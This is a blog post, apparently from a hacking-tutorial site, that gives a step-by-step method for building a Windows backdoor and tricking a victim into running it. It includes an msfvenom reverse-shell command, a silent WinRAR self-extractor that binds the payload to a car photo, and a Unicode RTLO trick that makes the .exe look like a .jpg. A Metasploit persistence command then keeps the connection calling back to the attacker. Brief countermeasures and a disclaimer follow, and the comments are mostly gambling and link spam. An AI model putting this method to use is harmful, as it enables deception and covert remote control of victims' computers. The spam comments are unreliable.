Create a persistent backdoor by masking it with the RTLO character

CloserMalware

Hello everybody!!

After a few weeks of disconnection (and especially with back and neck pains), I took a little time to show you a little peculiar thing that once caught my attention.

You will always have heard that it is not advisable or that you do not download and even run files from unreliable or untrustworthy places (which we all do, right? 😆). I was like that before; – “bah, I’m careful, I know where I’m downloading”; – “If it is a pdf or an image or something like that, nothing happens, as long as it is not an .exe or a strange format, nothing happens … right ?“.

Well, the thing rather, is a little different. This post is not really focused on how to do a backdoor, but rather, how it can strain us, and well strain, if we do not have a minimum of care when, for example, visualize a image.

From the point of view of the attacker, the steps that could be done, as well as the tools and environments used, will be described throughout the post.

Using msfvenom that collects all the uses and tools of the Msfpayload and Msfencode since June 2015, in the same framework, the payload can be created. The command to be used will be, for example:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.36 LPORT=4444 --platform windows --arch x86 -f exe > reverse_tcp.exe

But first, it is necessary to know what we are doing. Taking a look at the msfvenom help, you can see what each input parameter that accompanies the command call means.

Msfvenom' help.

Therefore, our command indicates that the payload to be generated will be of type meterpreter using reverse connection via TCP under the windows operating system. The payloads of meterpreter have the peculiarity that it uses DLL injection in memory and that is why they sometimes become difficult to detect. I have opted for this payload because it is typical.

In addition, it indicates the local IP, that is, the IP of our machine, that for this environment controlled using virtual machines, the IP of my machine (attacker) is 192.168.1.36 (using ifconfig you can look at the IP), remembering that this IP is only available in internal or private networks (from the router inwards). On the other hand, it is also indicated the port through which the TCP communication will be opened (for example, 4444).

In the same way, the platform is indicated, that is, windows and the x86 architecture, although they are optional parameters.

Finally, the output format, in this case is executable type (exe).

All this is redirected to a specific path, you can also use it -o as it says in the help to save the payload in the path + name.format specified.

I could continue explaining some more things about msfvenom, as well as about meterpreter (since there is a lot of work and study behind). For example, to know what types of payloads there are, as well as, encoders, architecture, platform, etc., you can use –list <type> to list all the possible ones, payloads, encoders, architecture, platform, etc; To not lengthen too much, I’ll go a little to the point. Someday I will talk more about the topic in a post.

Finally we would have the payload reverse_tcp created.

Reverse tcp payload created.

The victim would execute this payload, but the victim does not know that, that is, we could associate it with an image (for example), so that when the image opens, it executes the payload without the victim being aware.

This point can be made in different ways; I will use one of the basic forms (and a bit old), and is “binding” the image to the payload by means of a SFX, that is, a self-extractible that can be generated with Winrar. But it can also be generated with other tools, for example, with AutoIt, although here it would not be necessary to do the payload with msfvenom; directly with a script, this tool would be able to compile a script au3 indicating the associated image and the payload. For convenience I will use Winrar.

Now we just need to look for an image that is attractive to the victim. I have searched for one, but it could be any other.

Ford Mustang GT.

With the chosen image, it should be converted into an icon using the ICO Convert online converter. At this point, we have the icon, the original image and the payload so we can now go to the point of using Winrar to create the SFX.

Selecting the original image and the payload, we launch Winrar to add both to the new SFX file. To do this you have to select Create SFX file and write an appropriate name, for example FordMustang.exe (it can be changed later).

Add to SFX.

Now that we are going to create an SFX, new options are enabled in the Advanced tab> SFX Options. A new window will open where we will begin to configure in the Configuration tab> Run after the extraction and we will add the two files (image and payload) that we want to be executed after the extraction.

Advanced setup tab of SFX.

We continue with the Modes tab where we select that the extraction is done in a temporary folder, and activate the silent mode in hide everything.

Advanced mode tab SFX.

We go to the Text and icon tab and indicate that it loads the icon that was previously created.

Text and Icon tab of SFX.

Finally, in the Update tab we assign the Update Mode to “Extract and replace files” and in Overwrite Mode to “Overwrite all files“.

Update tab of SFX.

Everything would be ready, we accept and we will have ready the SFX.

Final result.

Now you will say, “but, if it’s an exe!“, Yes, but now the RTLO (Right To Left Override) character comes into play. This character is a Unicode character (U+202e) that is used to read Arabic, Hebrew text, etc. But in certain cases it can do a lot of damage, and this is one of them.

To use this character, you can use the typical character map, in Linux for example “Character Map” and in Windows, likewise “Character Map“. As we are now in Windows I show you an image.

Character map RTLO.

Since the function of the character is to make everything on its right flip its letters, it will be placed in a specific place. In our case, we have: FordMustang.exe and we want to convert it so that it has a .jpg ending. For it to happen we must place the letters JPG in reverse, that is, GPJ so that when the flip is done, there is JPG. Placing the RTLO character before the letter G. Look how it looks!

Effect of RTLO character

I stayed that way when I discovered it 🤤. And of course you can say, okay, there is the exe name in front, but remember that not only with an .exe can execute code, you can use: .bat, .cmd, .com, .ink, .pif, .scr, .vb, .vbe, .vbs, .wsh. In addition, it is likely that using a little imagination, use of words and who knows if any other character in combination with RTLO it is possible to change the text in such a way that it is difficult to distinguish this type of masking.

Final, and unfortunately, the payload is hidden by an SFX and in turn masked by the RTLO character. If this comes to the victim and he executes it, he will see the photo of the Mustang GT that has been chosen as bait, but he has already executed the payload. The result is:

Final result with RTLO

Returning to the machine of the attacker, who will be waiting for the victim to “visualize” the Mustang GT that is going to sell him, will be with Metasploit waiting for the TCP communication to be opened by the victim.

Msfconsole launched. Metasploit.

As the attacker knows the type of payload that he has created, he will have configured Metasploit in the same way, so that he can communicate correctly, that is, he will have selected the appropriate handler responsible for TCP communication and the rest of the parameters which the payload was created.

Metasploit ready and listening Metasploit.

Once the victim has “visualized” the image, the attacker receives a response from the victim and opens the TCP communication.

Victim launch a malware.

Once the reverse connection is open, we can know system information with sysinfo.

System info of victim PC.

At this point, we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection will be lost as long as it does not “visualize” the image again. To avoid this, we should use a Ruby script called “persistence” written by Carlos Perez. Showing the help:

Persistent help.

So seeing this, our command will be:

 run persistence -U -i 5 -p 4444 -r 192.168.1.36

That is, every time the victim starts the session, the backdoor will try to open the connection every 5 seconds to the address 192.168.1.36:4444. The interval to choose will depend on what the attacker wants, if you want it to be a bit more stealthy, maybe with 5 min it is fine, if the interval is small, it is more likely to be detected.

Persistent script launched.

If the machine now restarts, the attacker will lose the connection, but the attacker will re-launch the command in Metasploit, “exploit” that will reopen the listening port, so that when the victim logs in again, the connection is reopened .

Unfortunately with all this, the attacker has managed to deceive the victim and install a backdoor that will always be active and waiting for it to receive response from the attacker to open a reverse connection.

COUNTERMEASURES

Seeing this and knowing how far it can get (I think anyone would give a little insecurity), there are some countermeasures to detect this by the victim to prevent it (at least as far as I know). That is, knowing that what he are about to visualize, open or execute, is legitimate or not.

On the one hand, the RTLO character works in certain circumstances, the example I have shown is in any folder (except in a network folder that would give a warning when trying to execute an exe even we, as a victim, don’t know it). On the other hand, if that file you have received, you place it on the desktop, the RTLO character doesn’t work. Also, if we look at details, it will tell us what its type is application and if we see its properties it will tell us that it is an .exe

Possible malwared detection.

If at any time you have doubts, whether you have bundled it or not, you can always look at which are the active communications on the machine and what is your associated PID and close the process with a taskkill -PID <processID> / F, this is with netstat -o -a. Also in the task manager you could see processes with a strange name. If the persistent payload is launched but has not connected to the attacker, in the task manager, you can see how a process with a strange name appears, launching and closing (this is due to the interval when creating the persistence). Once the connection has been established, it will remain constant.

Intermittent and fixed process.

To avoid this, if we go to system configuration (MSCONFIG), we can detect that there is something strange configured to be launched at the starting of the system. And that also has a launch route TEMP.

Weird configuration in MSCONFIG.

If we notice this, the best is to delete this start entry and therefore delete the TEMP of our machine.

As you can see, there are several ways to detect that something strange is happening. I have to say, surely not all backdoors work in the same way, but with the “guidelines” that I have commented, some information can be extracted. As always as a recommendation, is to have an antivirus, have the UAC (User Account Control) activated to the maximum, and have all the software updated, especially Windows, and remember that the last word, you have it.

Unfortunately, most people who use a computer don’t have at least a medium level of knowledge, so that if they are in such a situation, they can avoid it. Due to these situations, it is always good to share the knowledge one has learned and try to fight it.

Regarding the creation of the backdoor and the rest of the posts of Allhacked, IN ANY MOMMENT AND OF COURSE my person is NOT responsible for any misuse as it says in the Allhacked’s policies. Evil is out there, but not here; This post is focused on teaching the bad (to know how it works) and how it could be fought.

PS: Forgive so many images, but I wanted to be clear. I also remind you that the Allhacked including its posts (including this one), are also available in Spanish.

I hope I have explained myself clearly and I hope you liked it. See you in the next post! 😉

Happy Hacking!



207 thoughts on “Create a persistent backdoor by masking it with the RTLO character

  1. aba slot เป็นเกมที่ผู้เล่นจำเป็นต้องทายใจไพ่ที่จะถูกเผยจากเว็บ pg กรรมวิธีเล่นเกมนี้เริ่มด้วยการวางเดิมพันว่าการ์ดใดจะถูกเผย ผู้เล่นสามารถวางเดิมพันบนไพ่สามใบหรือห้าใบ

    Reply

  3. Excellent post. I was checking constantly this blog
    and I am impressed! Extremely helpful information specially the
    last part 🙂 I care for such information much.
    I was looking for this certain info for a very long time.
    Thank you and good luck.

    Reply

  4. ทุน 1 บาท เล่นได้ทุกค่ายเกม ทำเงินได้ไม่มีอั้น ถอนผ่านระบบ สล็อตออโต้ ทรูวอเลท เล่นได้ไม่จำกัด เกมสล็อตที่ดีที่สุด เว็บน่าเชื่อถือ pg slot โปรสล็อตสมาชิกใหม่ ไม่ต้องกังวล ได้เงินแน่นอน ถอนได้ทุกเวลา เงินเข้าบัญชีรวดเร็ว

    Reply

  5. ระบบใหม่ ใหญ่กว่าเดิม ทำเงินง่ายที่สุด เว็บสล็อตที่ทำเงินได้เร็วที่สุด โบนัสแตกง่าย จ่ายเงินจริง สล็อตโปร100 ถอนไม่อั้น ฝากถอน ออโต้ ไม่มีขั้นต่ำ 1 บาทถอนได้ไม่มีอั้น

    Reply

  6. ค่ายสล็อตมาใหม่ อัพเดทเกมทุกวัน ค่ายใหญ่ที่สุด เล่นสล็อตฟรีทุกค่าย สล็อตที่ดีที่สุด ทดลองเล่นสล็อตpgฟรีได้เงินจริง รวมเกมทุกค่ายไว้ที่เดียว เล่นฟรี ได้เงินจริง แจกไม่อั้น

    Reply

  7. สล็อตเว็บตรง ทำเงินได้จริง ส่งตรงจากต่างประเทศ เกมสล็อตรวมครบทุกค่าย เล่นแบบไม่อั้น รับรางวัลได้เลยไม่มีจำกัด เกมสล็อต เครดิตฟรี สล็อตทุกรูปแบบ พนันออนไลน์ แบบไร้ขีดจำกัด

    Reply

  8. เว็บสล็อตได้เงินได้จริง เล่นเกมสล็อตทุกวันไม่มีเบื่อ ทำเงินได้เร็วที่สุด ทดลองเล่นสล็อตทุกค่าย ambsuperslot.app ทำเงินได้จริง ไม่มีสะดุด ถอนเงินได้ไม่มีอั้น เดิมพันไม่มีขั้นต่ำ

    Reply

  11. I vivaciously recommend taking a gander at the singular yoga blog, Yogibynight.com. It offers a wealth of significant encounters, tips, and resources for yoga fans. Make an effort not to miss the significant opportunity to examine Yogibynight.com and take your yoga practice higher than any time in recent memory. Yoga blog

    Reply
  67. Thank you For your hard work over the years! For this, we give you the opportunity. https://google.com#1234567890 For more information, see the instructions. skfhjvkjsdjsrbhvbsrfhkis 1030180 says:

    Thank you For your hard work over the years! For this, we give you the opportunity. https://google.com#1234567890 For more information, see the instructions. skfhjvkjsdjsrbhvbsrfhkis

    Reply

  69. Totally! Finding info portals in the UK can be overwhelming, but there are tons resources accessible to help you espy the unexcelled identical as you. As I mentioned before, conducting an online search with a view https://www.futureelvaston.co.uk/art/how-old-is-corey-rose-from-9-news.html “UK hot item websites” or “British intelligence portals” is a great starting point. Not one desire this grant you a encyclopaedic shopping list of report websites, but it will also provender you with a improved savvy comprehension or of the current news landscape in the UK.
    Aeons ago you secure a list of future news portals, it’s important to estimate each one to determine which richest suits your preferences. As an benchmark, BBC Intelligence is known for its intention reporting of information stories, while The Guardian is known representing its in-depth opinion of political and social issues. The Self-governing is known representing its investigative journalism, while The Times is known in search its work and funds coverage. During understanding these differences, you can choose the rumour portal that caters to your interests and provides you with the news you hope for to read.
    Additionally, it’s quality looking at neighbourhood pub news portals because specific regions within the UK. These portals lay down coverage of events and news stories that are fitting to the область, which can be specially helpful if you’re looking to charge of up with events in your neighbourhood pub community. In place of instance, provincial good copy portals in London classify the Evening Standard and the Londonist, while Manchester Evening Talk and Liverpool Reflection are in demand in the North West.
    Overall, there are diverse statement portals available in the UK, and it’s significant to do your research to remark the one that suits your needs. By evaluating the unalike news broadcast portals based on their coverage, dash, and editorial perspective, you can judge the individual that provides you with the most apposite and attractive info stories. Meet destiny with your search, and I hope this bumf helps you discover the perfect news broadcast portal inasmuch as you!

    Reply

  140. Great work! This is the kind of information that are
    supposed to be shared across the net. Disgrace
    on Google for now not positioning this post higher!
    Come on over and discuss with my web site . Thanks =)

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *